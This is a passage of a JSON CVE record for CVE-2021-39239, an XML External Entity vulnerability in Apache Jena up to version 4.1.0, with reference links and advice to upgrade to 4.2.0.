"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "high"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "XML External Entity (XXE) vulnerability"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E",
"refsource": "MISC",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d@%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45@%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"refsource": "MLIST",
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d@%3Cdev.jena.apache.org%3E"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.2.0 or later."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2021-39239",
"datePublished": "2021-09-16T14:40:20",
"dateReserved": "2021-08-17T00:00:00",
"dateUpdated": "2024-08-04T02:06:40.799Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}